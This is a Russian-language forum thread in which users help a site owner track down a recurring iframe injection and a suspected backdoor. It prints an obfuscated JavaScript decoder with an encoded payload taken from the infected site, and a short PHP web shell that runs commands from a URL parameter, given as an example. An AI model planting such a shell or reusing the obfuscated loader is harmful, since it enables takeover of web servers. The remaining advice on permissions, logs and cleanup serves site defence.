К сожалению на gov не работал =) Пасс на ФТП поменял? если не боишся то можеш кинуть в личку ссылку на архив с копией файлов двига. бум искать шелл.
Все, все да не все Твой код соответствует этому: Code: <script language="javascript"> function dosometing( subvalue ){ var s1 = "Uynwt85eFPV1QOfELcWBRJG+gxZMh6Xvr7kb3d4/pKu9iNAqoTs2az0mSDCHIjlY"; var s2 = ''; var s3 = 18; var s4 = 0; for ( var i = 0; i < subvalue.length; i++ ) { var s5 = s1.indexOf( subvalue.charAt( i ) ); if ( s3 == 0 ) { s4 = s4 | s5; var s6 = ( s4 & 0xFF0000 ) >> 16; if ( s6 != 0 ) { s2 += String.fromCharCode( s6 ); } var s7 = ( s4 & 0xFF00 ) >> 8; if ( s7 != 0 ){ s2 += String.fromCharCode( s7 ); } var s8 = s4 & 0xFF; if ( s8 != 0 ){ s2 += String.fromCharCode( s8 ); } s4 = 0; s3 = 18; } else { s5 = s5 << s3; s4 = s4 | s5; s3 -= 6; } } return s2; } alert( dosometing( 'E5d4h48NxWy2h4QjF47a6eUC1sjah/JkgBRAg0SqZGD3x+rAh57oFkymZGcaZwaTF57dZG6p6waTFeOa XGTdEWP0Z+OKg4diZ+cDfkypZGc3xGSkEboqZGxsgGzdErUU' ) ); </script> Что собственно сильно на результат не влияет Хотя немного странно... ИМХО это все-таки троян (ну всмысле автоматом делается). Просто внимательно надо посмотреть принцип работы... А че шелл?.. Если это и шелл (хотя маловероятно), то шелл ТС и сам может найти... Весь PHP-код на сайте посмотри. Там что-то "инородное" сразу, в принципе, невооруженным глазом видно
сервер на никсах? смотри тщательно процессы. Все эти дела может запускать простенький скрипт, фопеном грузить откуда-то то, что надо и все..раз в час или в другой промежуток времени. вобще выставь r-r-r на индекс.пхп, а еще лучше човни индекс другим юзером)) и права на запись потом уже убери.корень не забудь тоже.
$n@ke, спасибо, поменяю права сейчас! Нашел гниду! В папке инклудес валялась, посмотрите, что за дрянь: news127.inc больше метра весит
Это не шелл. Это прайс-лист, который ты можешь открыть и посмотреть, допустим, Word'ом 2007 Кстати он там и делался... Шелл это, допустим, вот так: Code: <?php if(isset($_GET['cmd']){ system($_GET['cmd']); passthru($_GET['cmd']); } ?> При чем данный код, может находиться хоть в середине, хоть в конце, хоть в начале документа. Ну это самый, что ни на есть простой тип. Более сложный это.... ну допустим... r57shell (взял его так как он и самый распространенный)... На 3 кб меньше
а ты точно уверен в хостинге? те сайты которые крутятся на этом же хостинге не страдают той же заразой? в саппорт не обращался? проверь по дате, может найдеш файлик который ты не менял, поищи по содержанию eval, system (хотя он может удаленно инклудиться), просмотри лог апача... а так $n@ke написал все правильно
Так этот "скриптик" можно изменить: <?php echo "Всё зае*ись! Шелов не обнаружено"; ?> Поэтому удалять его нужно с сервера до следующей проверки
Хостинг sweb.ru Обращаться нет смысла, как всегда скажут смотрите свой комп. Др сайты на этом хосте норм!
Как я понял, ифрейм добавляется с переодичностью, поиск идет по index.php, indeh.html, index.htm и так далее. И на сколько мне известно (или в апаче или где, сам не спец) можно делать, чтоб при заходе на site.com мы заходили не на site.com/index.php, а например, site.com/tratata.php. Это, конечно, только, чтоб не было ифреймов, а было время спокойно поискать что откуда
